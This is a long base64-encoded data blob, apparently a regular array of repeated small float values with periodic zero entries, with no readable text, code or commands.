PLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPL